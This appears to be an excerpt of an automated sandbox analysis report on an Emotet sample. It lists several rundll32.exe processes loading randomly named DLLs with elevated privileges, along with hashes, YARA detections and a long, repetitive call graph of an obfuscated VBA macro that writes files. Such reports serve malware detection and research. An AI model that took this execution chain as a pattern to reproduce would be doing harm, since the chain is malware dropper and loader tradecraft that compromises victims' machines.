                                        • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 0000000F.00000002.2105544671.00000000001F0000.00000040.00000001.sdmp, Author: Joe Security
                                        • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 0000000F.00000002.2105601376.0000000000211000.00000020.00000001.sdmp, Author: Joe Security
                                        Reputation:moderate

                                        General

                                        Start time:18:35:49
                                        Start date:07/01/2021
                                        Path:C:\Windows\SysWOW64\rundll32.exe
                                        Wow64 process (32bit):true
                                        Commandline:C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Ngtbqtsge\bgcbpmtq.wzo',Control_RunDLL
                                        Imagebase:0xa70000
                                        File size:44544 bytes
                                        MD5 hash:51138BEEA3E2C21EC44D0932C71762A8
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Yara matches:
                                        • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000010.00000002.2106608092.00000000001B0000.00000040.00000001.sdmp, Author: Joe Security
                                        • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000010.00000002.2106652050.00000000001D1000.00000020.00000001.sdmp, Author: Joe Security

                                        General

                                        Start time:18:35:49
                                        Start date:07/01/2021
                                        Path:C:\Windows\SysWOW64\rundll32.exe
                                        Wow64 process (32bit):true
                                        Commandline:C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Loyvqvaohpqmmxv\wleeyowrrvrssq.giw',Control_RunDLL
                                        Imagebase:0xa70000
                                        File size:44544 bytes
                                        MD5 hash:51138BEEA3E2C21EC44D0932C71762A8
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Yara matches:
                                        • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000011.00000002.2110599101.0000000000211000.00000020.00000001.sdmp, Author: Joe Security
                                        • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000011.00000002.2110533046.00000000001F0000.00000040.00000001.sdmp, Author: Joe Security

                                        General

                                        Start time:18:35:50
                                        Start date:07/01/2021
                                        Path:C:\Windows\SysWOW64\rundll32.exe
                                        Wow64 process (32bit):true
                                        Commandline:C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Rqvte\amll.nuu',Control_RunDLL
                                        Imagebase:0xa70000
                                        File size:44544 bytes
                                        MD5 hash:51138BEEA3E2C21EC44D0932C71762A8
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Yara matches:
                                        • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000012.00000002.2110963948.00000000001F0000.00000040.00000001.sdmp, Author: Joe Security
                                        • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000012.00000002.2110998210.0000000000211000.00000020.00000001.sdmp, Author: Joe Security

                                        General

                                        Start time:18:35:51
                                        Start date:07/01/2021
                                        Path:C:\Windows\SysWOW64\rundll32.exe
                                        Wow64 process (32bit):true
                                        Commandline:C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Gpjmjgasqrjuply\qjwbjnwqtblulz.cqq',Control_RunDLL
                                        Imagebase:0xa70000
                                        File size:44544 bytes
                                        MD5 hash:51138BEEA3E2C21EC44D0932C71762A8
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Yara matches:
                                        • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000013.00000002.2341899738.00000000006F1000.00000020.00000001.sdmp, Author: Joe Security
                                        • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000013.00000002.2341761700.00000000002B0000.00000040.00000001.sdmp, Author: Joe Security

                                        Disassembly

                                        Code Analysis

                                        Call Graph

                                        Module: A81c_pcot0t3c8

                                        Declaration
                                        Line  Content
                                        1     Attribute VB_Name = "A81c_pcot0t3c8"

                                        Executed Functions
                                        APIs    Meta Information

                                        Xj1p0_yor4q8g

                                        Item

                                        Gdmbhv991jtvgzq

                                        hlEyDCTAH

                                        CreateObject

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: yKTqX

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: CreateObject

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: CreateTextFile

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: WriteLine

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: WriteLine

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: WriteLine

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: PdhtG

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: Close

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: QAhNFQ

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: WOdrGBJG

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: CreateObject

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: CreateTextFile

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: WriteLine

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: WriteLine

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: WriteLine

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: GPfHF

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: Close

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: hKjoxAHI

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: ODgRUaAId

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: CreateObject

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: CreateTextFile

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: WriteLine

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: WriteLine

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: WriteLine

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: uLRAyCA

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: Close

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: LBFSC

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: YBonG

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: CreateObject

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: CreateTextFile

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: WriteLine

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: WriteLine

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: WriteLine

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: noyuzC

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: Close

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: gxwmz

                                        CreateTextFile

                                        WriteLine

                                        WriteLine

                                        WriteLine

                                        eHrGyvyM

                                        Close

                                        cVkLD

                                        tIaWTAJA

                                        CreateObject

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: yKTqX

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: CreateObject

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: CreateTextFile

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: WriteLine

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: WriteLine

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: WriteLine

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: PdhtG

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: Close

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: QAhNFQ

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: WOdrGBJG

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: CreateObject

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: CreateTextFile

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: WriteLine

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: WriteLine

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: WriteLine

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: GPfHF

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: Close

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: hKjoxAHI

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: ODgRUaAId

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: CreateObject

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: CreateTextFile

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: WriteLine

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: WriteLine

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: WriteLine

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: uLRAyCA

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: Close

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: LBFSC

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: YBonG

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: CreateObject

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: CreateTextFile

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: WriteLine

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: WriteLine

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: WriteLine

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: noyuzC

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: Close

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: gxwmz

                                        CreateTextFile

                                        WriteLine

                                        WriteLine

                                        WriteLine

                                        PvcTcFOF

                                        Close

                                        chutdOAFs

                                        XhUYUbSBA

                                        CreateObject

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: yKTqX

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: CreateObject

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: CreateTextFile

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: WriteLine

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: WriteLine

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: WriteLine

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: PdhtG

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: Close

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: QAhNFQ

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: WOdrGBJG

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: CreateObject

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: CreateTextFile

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: WriteLine

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: WriteLine

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: WriteLine

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: GPfHF

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: Close

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: hKjoxAHI

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: ODgRUaAId

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: CreateObject

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: CreateTextFile

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: WriteLine

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: WriteLine

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: WriteLine

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: uLRAyCA

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: Close

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: LBFSC

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: YBonG

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: CreateObject

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: CreateTextFile

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: WriteLine

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: WriteLine

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: WriteLine

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: noyuzC

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: Close

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: gxwmz

                                        CreateTextFile

                                        WriteLine

                                        WriteLine

                                        WriteLine

                                        pzqeBGIAH

                                        Close

                                        TbHJC

                                        eBvGf

                                        CreateObject

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: yKTqX

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: CreateObject

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: CreateTextFile

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: WriteLine

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: WriteLine

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: WriteLine

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: PdhtG

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: Close

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: QAhNFQ

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: WOdrGBJG

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: CreateObject

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: CreateTextFile

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: WriteLine

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: WriteLine

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: WriteLine

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: GPfHF

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: Close

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: hKjoxAHI

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: ODgRUaAId

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: CreateObject

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: CreateTextFile

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: WriteLine

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: WriteLine

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: WriteLine

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: uLRAyCA

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: Close

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: LBFSC

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: YBonG

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: CreateObject

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: CreateTextFile

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: WriteLine

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: WriteLine

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: WriteLine

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: noyuzC

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: Close

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: gxwmz

                                        CreateTextFile

                                        WriteLine

                                        WriteLine

                                        WriteLine

                                        bYwGEijH

                                        Close

                                        uvgvJGfI

                                        Mid

                                        Name

                                        Application

                                        rINmB

                                        CreateObject

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: yKTqX

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: CreateObject

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: CreateTextFile

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: WriteLine

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: WriteLine

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: WriteLine

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: PdhtG

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: Close

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: QAhNFQ

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: WOdrGBJG

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: CreateObject

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: CreateTextFile

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: WriteLine

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: WriteLine

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: WriteLine

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: GPfHF

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: Close

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: hKjoxAHI

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: ODgRUaAId

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: CreateObject

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: CreateTextFile

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: WriteLine

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: WriteLine

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: WriteLine

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: uLRAyCA

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: Close

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: LBFSC

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: YBonG

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: CreateObject

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: CreateTextFile

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: WriteLine

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: WriteLine

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: WriteLine

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: noyuzC

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: Close

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: gxwmz

                                        CreateTextFile

                                        WriteLine

                                        WriteLine

                                        WriteLine

                                        iOplaUSwB

                                        Close

                                        kUseBAG

                                        qdDeFbDk

                                        CreateObject

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: yKTqX

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: CreateObject

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: CreateTextFile

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: WriteLine

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: WriteLine

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: WriteLine

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: PdhtG

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: Close

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: QAhNFQ

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: WOdrGBJG

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: CreateObject

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: CreateTextFile

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: WriteLine

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: WriteLine

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: WriteLine

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: GPfHF

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: Close

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: hKjoxAHI

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: ODgRUaAId

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: CreateObject

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: CreateTextFile

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: WriteLine

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: WriteLine

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: WriteLine

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: uLRAyCA

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: Close

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: LBFSC

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: YBonG

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: CreateObject

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: CreateTextFile

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: WriteLine

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: WriteLine

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: WriteLine

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: noyuzC

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: Close

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: gxwmz

                                        CreateTextFile

                                        WriteLine

                                        WriteLine

                                        WriteLine

                                        UbNkCZ

                                        Close

                                        fMPBmQ

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: yKTqX

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: CreateObject

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: CreateTextFile

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: WriteLine

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: WriteLine

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: WriteLine

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: PdhtG

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: Close

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: QAhNFQ

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: WOdrGBJG

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: CreateObject

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: CreateTextFile

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: WriteLine

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: WriteLine

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: WriteLine

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: GPfHF

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: Close

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: hKjoxAHI

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: ODgRUaAId

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: CreateObject

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: CreateTextFile

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: WriteLine

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: WriteLine

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: WriteLine

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: uLRAyCA

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: Close

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: LBFSC

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: YBonG

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: CreateObject

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: CreateTextFile

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: WriteLine

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: WriteLine

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: WriteLine

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: noyuzC

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: Close

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: gxwmz

                                        sbLwDeWJ

                                        CreateObject

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: yKTqX

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: CreateObject

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: CreateTextFile

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: WriteLine

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: WriteLine

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: WriteLine

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: PdhtG

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: Close

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: QAhNFQ

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: WOdrGBJG

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: CreateObject

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: CreateTextFile

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: WriteLine

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: WriteLine

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: WriteLine

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: GPfHF

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: Close

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: hKjoxAHI

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: ODgRUaAId

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: CreateObject

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: CreateTextFile

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: WriteLine

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: WriteLine

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: WriteLine

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: uLRAyCA

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: Close

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: LBFSC

